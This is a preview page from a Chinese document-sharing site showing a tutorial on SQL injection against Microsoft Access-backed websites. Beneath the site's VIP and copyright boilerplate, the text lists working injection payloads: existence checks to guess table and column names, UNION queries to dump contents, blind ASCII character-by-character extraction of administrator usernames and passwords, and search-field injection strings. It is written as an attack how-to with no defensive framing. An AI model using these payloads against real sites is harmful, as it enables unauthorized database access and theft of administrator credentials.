Access数据库注入高级玩法实用.pdfVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
Access 数据库注入高级玩法 Access 数据库注入高级玩法,鉴于论坛的朋友要求,在这整理下,以飨读者。 Access 数据库想对于 MsSql 来说可谓小巫见大巫,但是 Acc 的数据库在目前国内还是有一定的市场,其注入也很灵活。相信你看完本 文就会了解到 Access 也是很强大的。 一,基础篇 猜解表名,这里借用啊 D 的语句: and exists (select * from 表名 ) 猜解列名: and exists (select 字段 from 表名 ) UNION法,在执行 union 之前建议进行下 order by 这样会更快。 联合查询: select name,password,id from user union select user,pwd,uid from 如果遇到 order by 错误提示,执行下 2 次 union 可解决 and 1=2 union select 1,2,3,4,5 from 表名 union select 1,2,3,4,5 from 表名 爆指定表名内容: and 1=2 union select 1,2,3,4,5 from 表名 ASCII 逐字解码法: 1、猜解列长度 猜解语句: and (select top 1 len( 列名 )from 表名 )N and (select top 1 len( 列名 )from 表名 )=N 其中 N是数字,变换这个 N 的值猜解列长度,例如: and (select top 1 len( 列名 )from 表名 )1 and (select top 1 len( 列名 )from 表名 )6 如果一直猜到 6 都显示正常页面,猜到 7 的时候返回错误(大于 6 并且小于等于 7),那么该列的长度为 7 。因为“ top 1 ”的意思是把最靠前的 1 条记录给提取出来,所以如果要猜解第二条记录就该使用: select top 1 len( 列名 ) from 表名 where 列名 not in (select top 1 列名 from 表名 ) 2、ASCII 码分析法猜解用户和密码 ASC() 函数和 Mid 函数 例如: mid( 列名 ,N,1) ASC(mdi( 列名 ,N,1)) 得到“列名”第 N位字符 ASCII 码 猜解语句为: and (select top 1 asc(mid( 字段 ,1,1)) from 数据库名 )=ASC 码( 通过转换工具换 ) 区间判断语句: “betweenand ” 中文处理法 : 当 ASCII 转换后为“负数”使用 abs() 函数取绝对值。 例: and (select top 1 abs(asc(mid( 字段 ,1,1))) from 数据库名 )=ASC码 ( 通过转换工具换 ) ASCII 逐字解码法的应用: 1、猜解表名: and (select count(*) from admin)0 2、猜解列名: and (select count( 列名 ) from 表名 )0 3、猜解管理员用户个数: and (select count(*) from 表名 )=1 返回正常,表中有一条记录。 4、猜解管理员用户名的长度: and (select len( 列名 ) from 表名 )=1 、=2、=3、=4。 5、猜解管理员用户名: and (select count(*)from 表名 where (asc(mid( 列名 ,1,1))) between 30 and 130)0 最后提交: and (select asc(mid( 列名 ,1,1)) from 表名 )=ascii 的值 6、猜解管理员的密码: 按照上面的原理,只要把上面的语句中 (asc(mid( 列名 ,1,1) 的列名换成 PASSWORD就能得到管理员的密 码了。 搜索型注入漏洞利用猜解语句: 关键字 % and 1=1 and %=% 关键字 % and 1=2 and %=% 将 and 1=1 换成注入语句

您可能关注的文档

文档评论(0)

高胖莹 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档